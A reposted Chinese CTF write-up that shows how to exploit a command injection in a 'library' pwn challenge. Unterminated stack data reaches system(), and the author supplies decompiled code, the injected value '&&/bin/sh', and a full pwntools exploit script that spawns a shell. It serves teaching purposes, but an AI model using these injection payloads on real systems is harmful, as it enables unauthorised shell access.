0x00 前言

這種命令列注入在pwn中出現的比較少，所以記錄分享一下。

0x01 命令列注入介紹

熟悉web安全的話就知道，如果對特殊字元過濾不當，會引發sql注入或者xss等安全漏洞。其中，命令列注入較為嚴重，因為可以直接拿到漏洞程式當前許可權的OSshell。

然而，命令列注入不僅在web中會出現，在C語言程式中，也會出現命令列注入的漏洞。比方說這道pwn題，就是呼叫system時，沒有對輸入資料進行\0截斷以及對特殊字元處理不當而導致的。

命令列注入相對於其他二進位制漏洞相比利用比較簡單，比方說這道題，舉個例子：

sprintf(&s, "du -sh lib/'%s'", v6);

system(&s);

其中設計初衷，v6應當是一個合法的檔名。但是如果攻擊者惡意操控v6，比方說，讓v6為：'&&/bin/sh'
進行sprintf拼接後，system所執行的命令為：

du -sh lib/''&&/bin/sh''

這裡有兩個linux命令列的知識：

&&，這是拼接兩個命令，如果我們執行 command1&&command2，那麼等價於先執行command1在執行command2。其中命令跟&&之間不必加空格。

在命令後不加空格的''（兩個單引號）會被忽略，比如ls''等價於ls，/bin/sh''等價於/bin/sh，du -sh lib/''等價於du -sh lib/（即，實際傳進去的引數是lib/不是lib/''）

所以，執行上面的命令，相當於先執行了

du -sh lib/

再執行

/bin/sh

所以，可以getshell。

0x02 題目

題目所給的是一個library的服務，可以上傳book，檢視books，清除books。其中，book存放在lib/資料夾中。

0x03 漏洞點

char *list_books()

{

FILE *v0; // eax

char *result; // eax

char s; // [esp+4h] [ebp-C14h]

char ptr; // [esp+804h] [ebp-414h]

char *v4; // [esp+C04h] [ebp-14h]

FILE *stream; // [esp+C08h] [ebp-10h]

char *v6; // [esp+C0Ch] [ebp-Ch]

v0 = popen("ls lib/", "r");

stream = v0;

result = (char *)fread(&ptr, 1u, 0x400u, v0);

v4 = result;

if ( result )

{

v6 = strtok(&ptr, delims);

result = (char *)send("Book list:\nSize\tE-book\n");

while ( v6 )

{

sprintf(&s, "du -sh lib/'%s'", v6);

//很明顯，這裡存在可能的命令列注入

system(&s);

fflush(stdout);

result = strtok(0, delims);

v6 = result;

}

}

return result;

其中list_books程式碼如上，v6來自fread從popen中的返回結果。他本來想做的是輸出每個檔案的大小，但是fread後沒有用\0截斷。所以呼叫strtok時，可能會讀到fread後面的垃圾資料（當然如果可以操控的話就不是垃圾資料了）

sprintf的棧溢位會比較難利用，因為&s比較大，有0x800，而v6是從&ptr裡面strtok出來的，而&ptr更小，只有0x400。所以應該沒法很好的利用。

0x04 操控垃圾資料

那麼，我們怎麼去操控&ptr中的垃圾資料呢？這個時候看看另外一個函式

int upload_book()

{

char *v1; // eax

int v2; // eax

char buf[1024]; // [esp+Ch] [ebp-42Ch]

char s[20]; // [esp+40Ch] [ebp-2Ch]

FILE *stream; // [esp+420h] [ebp-18h]

char *dest; // [esp+424h] [ebp-14h]

size_t v7; // [esp+428h] [ebp-10h]

int v8; // [esp+42Ch] [ebp-Ch]

if ( book_counter > 10 )

return send("too many books\n");

send("Book filename: ");

v8 = __isoc99_scanf("%20s", s);

if ( v8 != 1 )

return send("Wrong title format\n");

v7 = strlen(s);

if ( strcmp(&s[v7 - 3], ".bk") )

return send("The name needs to end with '.bk'\n");

send("e-book contents: \n");

read(0, buf, 0x400u);

if ( *(_DWORD *)buf != 'BBBB' )

return send("Not an e-book\naborting...\n");

v1 = (char *)malloc(0x18u);

dest = v1;

*(_DWORD *)v1 = 0x2F62696C;

v1[4] = 0;

strcat(dest, s);

stream = fopen(dest, "w");

if ( !stream )

return send("Bad book filename\n");

v2 = book_counter++;

books[v2] = dest;

fwrite(buf, 1u, 0x400u, stream);

return fclose(stream);

}

其中，這在棧中也會分配0x400個位元組，並且我們可以寫入。

並且，呼叫完這個函式之後，清除棧空間時，只是簡單地add esp,xxx，並不會清空其中資料。然後，再呼叫存在命令列注入的函式並分配棧空間時，也只是單純地sub esp,xxx，也不會清空資料。在C語言中，如果此時對不賦值的區域性變數直接訪問的話，是UB行為。但是，從二進位制安全的角度看的話，便是可利用的點了。其中這道題，本身就是一個區域性字串讀取後未截斷而造成的UB，然而我們便可以利用這個。

那麼來試試：

很明顯，BBBB123456789123456789123456789123456789AAAA的後面89123456789AAAA被拼接到du -sh lib/'%s'中了

動態除錯看一下的話

第一次在system停下

第二次在system停下

所以很明顯，只要把89123456789AAAA改成

'&&/bin/sh'\x00

就可以getshell了。如前面所說。

其中，\x00是我們自己手動截斷，不然strtok還會繼續往後讀。

所以最後exp

#BBBB1234567891234567891234567'&&/bin/sh'

g_local = True

from pwn import *

if g_local:

sh=process("./library")

else:

sh=remote("xxxx",1234)

def upload_book(filename, content):

filename += ".bk"

sh.send("1\n")

sh.recvuntil("Book filename: ")

print filename

sh.send(filename + "\n")

sh.recvuntil("e-book contents: \n")

sh.send(content)

sh.recvuntil("Enter command: ")

def list_books_and_shell():

sh.send("2\n")

sh.interactive()

upload_book("1", "BBBB1234567891234567891234567\'&&/bin/sh\'\x00")

list_books_and_shell()

0x05 後言

還有一點要注意，pwndbg好像會預設在fork時跟子程式，所以要在~/.gdbinit的最後面(載入pwndbg之後)加上set follow-fork-mode parent。並且，&&與命令之間不能加空格。因為他strtok是通過空格和換行分斷字串的，加了空格我們的payload就會被strtok分割開。

本文由看雪論壇 holing 原創 轉載請註明來自看雪社群